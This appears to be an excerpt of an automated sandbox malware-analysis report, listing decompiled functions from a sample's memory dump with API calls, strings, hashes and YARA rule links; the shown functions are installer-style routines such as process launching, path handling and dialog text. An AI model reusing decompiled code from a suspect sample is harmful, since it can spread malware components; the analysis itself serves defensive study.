                                          • API String ID: 2928410991-2641672736
                                          • Opcode ID: d1b3ddf9fb01f5f87afefb093d8fc0f214f17ed02c1910b4308fe52a8263cf6a
                                          • Instruction ID: c91547dca7855072b4129fabf150c041ae011a61f3c8998262423de82a0222ae
                                          • Opcode Fuzzy Hash: d1b3ddf9fb01f5f87afefb093d8fc0f214f17ed02c1910b4308fe52a8263cf6a
                                          • Instruction Fuzzy Hash: 323108B4900209EFEB14CF84C888BEEB7F5FB44345F20855AE9056B285D374AE84DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004044B6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
			}













                                          0x004044be
                                          0x004044c2
                                          0x004044ca
                                          0x004044cd
                                          0x004044ce
                                          0x004044d0
                                          0x004044d2
                                          0x004044d5
                                          0x004044d5
                                          0x004044dc
                                          0x004044e2
                                          0x004044e2
                                          0x004044e9
                                          0x004044f4
                                          0x004044f5
                                          0x004044f8
                                          0x004044f8
                                          0x00404505
                                          0x00404510
                                          0x00404513
                                          0x00404525
                                          0x0040452c
                                          0x0040452d
                                          0x0040453c
                                          0x0040454c
                                          0x00404568

                                          APIs
                                          • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                          • wsprintfA.USER32 ref: 0040454C
                                          • SetDlgItemTextA.USER32(?,00429FD8), ref: 0040455F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                          • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                          • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                          • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405889();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                          0x00401bb6
                                          0x00401bc2
                                          0x00401bc5
                                          0x00401bce
                                          0x00401bce
                                          0x00401bd1
                                          0x00401bd5
                                          0x00401bde
                                          0x00401bde
                                          0x00401be1
                                          0x00401be5
                                          0x00401be7
                                          0x00401c34
                                          0x00401c36
                                          0x00401c3f
                                          0x00401c47
                                          0x00401c4a
                                          0x00401c4a
                                          0x00401c53
                                          0x00000000
                                          0x00401be9
                                          0x00401bf0
                                          0x00401bf2
                                          0x00401bfa
                                          0x00401bfd
                                          0x00401c25
                                          0x00401c59
                                          0x00401c59
                                          0x00401bff
                                          0x00401c0d
                                          0x00401c15
                                          0x00401c18
                                          0x00401c18
                                          0x00401bfd
                                          0x00401c5c
                                          0x00401c5f
                                          0x00401c65
                                          0x00402825
                                          0x00402825
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                          • SendMessageA.USER32 ref: 00401C25
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                          • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                          • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                          • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000DDC3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • __woutput_l.LIBCMT ref: 1000DE1C
                                            • Part of subcall function 1000EEDB: __getptd_noexit.LIBCMT ref: 1000EEDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __getptd_noexit__woutput_l
                                          • String ID: B
                                          • API String ID: 3669879410-1255198513
                                          • Opcode ID: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                                          • Instruction ID: f5970ea7841dbd41225c887377fceb4ccc1b2774bd36d29a24c4a66a397bf882
                                          • Opcode Fuzzy Hash: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                                          • Instruction Fuzzy Hash: 0511607190425D9EEF00EFA8DC819EEB7B8FF08394F10412BE815A6285EB3599058B71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000014), ref: 10002AB5
                                          • HeapAlloc.KERNEL32(00000000), ref: 10002ABC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$AllocProcess
                                          • String ID: returning %p
                                          • API String ID: 1617791916-1981732286
                                          • Opcode ID: 68b521b97bfb92d8346331d6d3625f8042e18750b929dbe9ece2fedea7593cdc
                                          • Instruction ID: 5cf1d514b477252b5a9a27c918d9b124f231ee9ce3ae76c2b0636738c4a9c396
                                          • Opcode Fuzzy Hash: 68b521b97bfb92d8346331d6d3625f8042e18750b929dbe9ece2fedea7593cdc
                                          • Instruction Fuzzy Hash: EF1139B8A00248EFEB01CF94C944B99B7F0EB49354F208198ED095B356D776DE84DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040518B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040518B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42bfe0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                          0x00405194
                                          0x004051b0
                                          0x004051b8
                                          0x004051bd
                                          0x00000000
                                          0x004051c3
                                          0x004051c7

                                          APIs
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                                          • CloseHandle.KERNEL32(?), ref: 004051BD
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                          • Error launching installer, xrefs: 0040519E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                          • API String ID: 3712363035-3894416041
                                          • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                          • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                          • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                          • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002B40, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19memoryregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCloseKey.ADVAPI32(?), ref: 10002B5B
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 10002B67
                                          • HeapFree.KERNEL32(00000000), ref: 10002B6E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$CloseFreeProcess
                                          • String ID: destroying %p
                                          • API String ID: 1203615452-3738993722
                                          • Opcode ID: b87447611b39c4c8c13bb7cd5be3be263e4eb9586296920040f0800865945d4f
                                          • Instruction ID: 8d935494a777c0bb9309948e0976d3e62e2b330e91ef4393346fd43074a5256e
                                          • Opcode Fuzzy Hash: b87447611b39c4c8c13bb7cd5be3be263e4eb9586296920040f0800865945d4f
                                          • Instruction Fuzzy Hash: 9CE012BD100218ABE700DF94DD89FE93BADEB4D745F048004FA0D8B211C675E9808BB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040541E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040541E(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                                          0x0040541f
                                          0x00405436
                                          0x0040543e
                                          0x0040543e
                                          0x00405446

                                          APIs
                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                          • CharPrevA.USER32(?,00000000), ref: 0040542D
                                          • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-4017390910
                                          • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                          • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                          • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                          • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10010BB0, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10010BE6
                                          • __isleadbyte_l.LIBCMT ref: 10010C14
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010C42
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010C78
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: a0fb378d693a50c4f1055ba6821a6901ac77a713fb28cb4761a7bace13ca4233
                                          • Instruction ID: a34ff9cdbd34352c44a27f0295f7af9ddf137694dfad050ba72e28238b107bbf
                                          • Opcode Fuzzy Hash: a0fb378d693a50c4f1055ba6821a6901ac77a713fb28cb4761a7bace13ca4233
                                          • Instruction Fuzzy Hash: D631A131704286EFDB11CF65CC84BAA7BE6FF41354F124529F8949B191E7B0E890DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                          0x00401ec7
                                          0x00401ecf
                                          0x00401ed4
                                          0x00401ed9
                                          0x00401edd
                                          0x00401ee0
                                          0x00401ee2
                                          0x00401ee9
                                          0x00401ef2
                                          0x00401efa
                                          0x00401efd
                                          0x00401f12
                                          0x00401f18
                                          0x00401f2b
                                          0x00401f34
                                          0x00401f40
                                          0x00401f45
                                          0x00401f45
                                          0x00401f2b
                                          0x00401f48
                                          0x00401b75
                                          0x00401b75
                                          0x00401efd
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                          • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                            • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 1404258612-0
                                          • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                          • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                          • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                          • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100151DD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 076e675045b4b51a1cbf387ffc5062350a0e207931462626bf86d1546e424296
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 42013D7A40014EFBCF129E84DC418ED3F66FB1A291B588415FE185D031D337D9B2AB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004054B2, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004054B2(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405264
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405449(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                          0x004054bb
                                          0x004054bb
                                          0x004054c2
                                          0x004054c5
                                          0x004054ca
                                          0x004054dd
                                          0x004054f7
                                          0x00000000
                                          0x004054f7
                                          0x004054e1
                                          0x004054e2
                                          0x004054e5
                                          0x004054e6
                                          0x004054ee
                                          0x00000000
                                          0x00000000
                                          0x004054f0
                                          0x004054f3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004054f3
                                          0x00000000
                                          0x004054d3
                                          0x00000000
                                          0x004054d4

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: dR@
                                          • API String ID: 3213498283-1322173608
                                          • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                          • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                          • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                          • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af8c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af93 = 1;
				 *0x40af90 = _t11 & 0x00000001;
				 *0x40af91 = _t11 & 0x00000002;
				 *0x40af92 = _t11 & 0x00000004;
				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af7c);
				_push(_t14);
				_push(_t26);
				E00405889();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                          0x00401d29
                                          0x00401d42
                                          0x00401d4c
                                          0x00401d51
                                          0x00401d5c
                                          0x00401d63
                                          0x00401d75
                                          0x00401d7b
                                          0x00401d80
                                          0x00401d8a
                                          0x004024aa
                                          0x00401561
                                          0x00402825
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirect
                                          • String ID:
                                          • API String ID: 3272661963-0
